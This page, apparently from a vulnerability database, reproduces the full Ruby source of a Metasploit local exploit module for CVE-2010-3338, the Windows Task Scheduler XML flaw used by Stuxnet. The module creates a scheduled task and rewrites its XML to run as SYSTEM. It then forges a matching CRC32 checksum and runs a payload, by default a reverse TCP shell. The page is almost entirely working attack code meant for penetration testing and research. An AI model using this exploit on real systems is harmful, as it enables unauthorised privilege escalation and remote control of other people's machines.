Lucene search
K

Windows Escalate Task Scheduler XML Privilege Escalation

🗓️ 13 Jun 2012 05:58:20Reported by jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 68 Views

Windows Task Scheduler XML Privilege Escalation by CRC3

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zlib'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::TaskScheduler
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Escalate Task Scheduler XML Privilege Escalation',
          'Description' => %q{
            This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
            When processing task files, the Windows Task Scheduler only uses a CRC32
            checksum to validate that the file has not been tampered with. Also, In a default
            configuration, normal users can read and write the task files that they have
            created. By modifying the task file and creating a CRC32 collision, an attacker
            can execute arbitrary commands with SYSTEM privileges.

            NOTE: Thanks to webDEViL for the information about disable/enable.
          },
          'License' => MSF_LICENSE,
          'Author' => [ 'jduck' ],
          'Platform' => [ 'win' ],
          'SessionTypes' => [ 'meterpreter' ],
          'Targets' => [
            [
              'Windows Vista / 7 / 2008 (Dropper)',
              {
                'Platform' => 'win',
                'Arch' => [ARCH_X86, ARCH_X64],
                'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
                'Type' => :win_dropper
              }
            ],
            [
              'Windows Vista / 7 / 2008 (Command)',
              {
                'Platform' => 'win',
                'Arch' => ARCH_CMD,
                'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
                'Payload' => { 'Space' => 261 },
                'Type' => :win_command
              }
            ]
          ],
          'References' => [
            [ 'OSVDB', '68518' ],
            [ 'CVE', '2010-3338' ],
            [ 'BID', '44357' ],
            [ 'MSB', 'MS10-092' ],
            [ 'EDB', '15589' ]
          ],
          'DisclosureDate' => '2010-09-13',
          'DefaultTarget' => 0,
          'Notes' => {
            'Stability' => [ CRASH_SAFE ],
            'Reliability' => [ REPEATABLE_SESSION ],
            'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
          },
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_channel_eof
                core_channel_open
                core_channel_read
                core_channel_write
                stdapi_sys_config_getenv
                stdapi_sys_config_getuid
              ]
            }
          }
        }
      )
    )

    register_options([
      OptString.new('TASKNAME', [ false, 'A name for the created task (default random)' ]),
    ])
    deregister_options(
      'ScheduleType',
      'ScheduleModifier',
      'ScheduleRemoteSystem',
      'ScheduleUsername',
      'SchedulePassword',
      'ScheduleObfuscationTechnique'
    )
  end

  def check
    return CheckCode::Safe("Target OS #{session.platform} is not vulnerable") unless session.platform == 'windows'

    system_info = sysinfo
    return CheckCode::Unknown('Could not retrieve OS system information.') unless system_info

    [ 'Windows Vista', 'Windows 7', 'Windows 2008' ].each do |v|
      return CheckCode::Detected if system_info['OS'].include?(v)
    end

    CheckCode::Safe("#{system_info['OS']} is not vulnerable")
  end

  def exploit
    fail_with(Failure::None, 'Session is already elevated') if is_system?
    fail_with(Failure::NoTarget, 'This exploit requires a meterpreter session') unless session.type == 'meterpreter'

    #
    # WOW64 Filesystem Redirection prevents us opening the file directly. To make matters
    # worse, meterpreter/railgun creates things in a new thread, making it much more
    # difficult to disable via Wow64EnableWow64FsRedirection. Until we can get around this,
    # offer a workaround and error out.
    #
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against via WOW64 is not supported, try using an x64 meterpreter...')
    end

    @taskname = datastore['TASKNAME'] || Rex::Text.rand_text_alphanumeric(8..15)

    case target['Type']
    when :win_command
      cmd = payload.encoded
      print_status("Using command: #{cmd}")
    when :win_dropper
      tempdir = get_env('TEMP')
      exe = generate_payload_exe
      cmd = "#{tempdir}\\#{Rex::Text.rand_text_alpha(6..13)}.exe"
      print_status("Preparing payload at #{cmd}")
      write_file(cmd, exe)
    end

    #
    # Create a new task to do our bidding, but make sure it doesn't run.
    #
    sysdir = get_env('SystemRoot')
    taskfile = "#{sysdir}\\system32\\tasks\\#{@taskname}"

    print_status("Creating task: #{@taskname}")
    task_create(@taskname, cmd, task_type: 'MONTHLY', obfuscation: 'NONE', runas: client.sys.config.getuid)

    #
    # Read the contents of the newly created task file
    #
    content = read_task_file(taskfile)

    #
    # Double-check that we got what we expect.
    #
    if content[0, 2] != "\xff\xfe"
      #
      # Convert to unicode, since it isn't already
      #
      content = content.unpack('C*').pack('v*')
    else
      #
      # NOTE: we strip the BOM here to exclude it from the crc32 calculation
      #
      content = content[2, content.length]
    end

    #
    # Record the crc32 for later calculations
    #
    old_crc32 = crc32(content)
    print_status('Original CRC32: ' + format('0x%.8x', old_crc32))

    #
    # Convert the file contents from unicode
    #
    content = content.unpack('v*').pack('C*')

    #
    # Mangle the contents to now run with SYSTEM privileges
    #
    content.gsub!('LeastPrivilege', 'HighestAvailable')
    content.gsub!(%r{<UserId>.*</UserId>}, '<UserId>S-1-5-18</UserId>')
    content.gsub!(%r{<Author>.*</Author>}, '<Author>S-1-5-18</Author>')
    # content.gsub!('<LogonType>InteractiveToken</LogonType>', '<LogonType>Password</LogonType>')
    content.gsub!('Principal id="Author"', 'Principal id="LocalSystem"')
    content.gsub!('Actions Context="Author"', 'Actions Context="LocalSystem"')
    content << '<!-- ZZ -->'

    #
    # Convert it back to unicode
    #
    content = Rex::Text.to_unicode(content)

    #
    # Fix it so the CRC matches again
    #
    fix_crc32(content, old_crc32)
    new_crc32 = crc32(content)
    print_status('Final CRC32: ' + format('0x%x', new_crc32))

    print_status('Writing our modified content back...')
    write_file(taskfile, "\xff\xfe#{content}")

    print_status("Validating task: #{@taskname}")
    task_query(@taskname)

    print_status('Disabling the task...')
    fail_with(Failure::Unknown, 'Could not disable task') unless exec_schtasks("schtasks.exe /change /tn #{@taskname} /disable")

    print_status('Enabling the task...')
    fail_with(Failure::Unknown, 'Could not enable task') unless exec_schtasks("schtasks.exe /change /tn #{@taskname} /enable")

    print_status('Executing the task...')
    task_start(@taskname)
  end

  def crc32(data)
    table = Zlib.crc_table
    crc = 0xffffffff
    data.unpack('C*').each do |b|
      crc = table[(crc & 0xff) ^ b] ^ (crc >> 8)
    end
    crc
  end

  def fix_crc32(data, old_crc)
    #
    # CRC32 stuff from ESET (presumably reversed from Stuxnet, which was presumably
    # reversed from Microsoft's code)
    #
    bwd_table = [
      0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
      0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
      0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
      0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
      0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
      0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
      0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
      0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
      0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
      0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
      0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
      0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
      0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
      0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
      0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
      0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
      0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
      0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
      0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
      0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
      0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
      0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
      0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
      0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
      0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
      0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
      0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
      0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
      0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
      0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
      0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
      0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
      0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
      0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
      0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
      0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
      0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
      0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
      0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
      0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
      0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
      0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
      0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
      0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
      0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
      0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
      0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
      0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
      0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
      0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
      0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
      0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
      0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
      0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
      0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
      0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
      0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
      0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
      0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
      0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
      0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
      0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
      0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
      0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
    ]

    crc = crc32(data[0, data.length - 12])
    data[-12, 4] = [crc].pack('V')

    data[-12, 12].unpack('C*').reverse.each do |b|
      old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
    end
    data[-12, 4] = [old_crc].pack('V')
  end

  def exec_schtasks(cmdline)
    lns = cmd_exec('cmd.exe', "/c #{cmdline.strip}")
    lns&.each_line do |ln|
      ln.chomp!
      print_status(ln)
      return true if ln.starts_with?('SUCCESS:')
    end
    false
  end

  def read_task_file(taskfile)
    print_status("Reading the task file contents from #{taskfile}...")

    # Can't read the file directly on Windows Server 2008
    # use session.fs.file.new instead
    content = ''
    fd = session.fs.file.new(taskfile, 'rb')
    content << fd.read until fd.eof?
    fd.close
    content
  end

  def cleanup
    return unless @taskname

    print_status("Deleting task #{@taskname}...")
    task_delete(@taskname, obfuscation: 'NONE')
  ensure
    super
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Aug 2022 05:19Current
7.8High risk
Vulners AI Score7.8
CVSS 27.2
EPSS0.1986
68